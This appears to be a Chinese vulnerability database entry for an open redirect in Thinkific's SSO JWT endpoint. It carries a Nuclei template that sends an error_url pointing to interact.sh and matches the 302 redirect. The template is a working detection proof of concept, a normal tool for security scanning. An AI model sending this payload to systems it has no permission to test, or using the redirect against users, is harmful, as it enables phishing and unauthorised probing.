thinkific-redirect: Thinkific - Open Redirect

日期: 2025-08-01 | 影响软件: Thinkific | POC: 已公开

漏洞描述

Thinkific contains an open redirect vulnerability via the http://interact.sh URL. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: thinkific-redirect

info:
  name: Thinkific - Open Redirect
  author: Gal Nagli
  severity: medium
  description: Thinkific contains an open redirect vulnerability via the http://interact.sh URL. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://gitlab.austinoneil.com/aoneil/bb-automation/-/blob/master/tools/nuclei-templates/vulnerabilities/other/thinkific-redirect.yaml
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    max-request: 1
  tags: redirect,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://interact.sh"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 302

      - type: word
        words:
          - "<a href=\"http://interact.sh?kind=jwt&message=Nil+JSON+web+token\""
        condition: or
        part: body
# digest: 4b0a00483046022100c1d78b58050839484346ff0d310c897a3c6e991b59d0766cb81dd9c28b06a953022100ebc10d0519e7367e25fadaf9e78926770274d0b354d6d62c3a3dc7501b828195:922c64590222798bb761d5b6d8e72950

相关漏洞推荐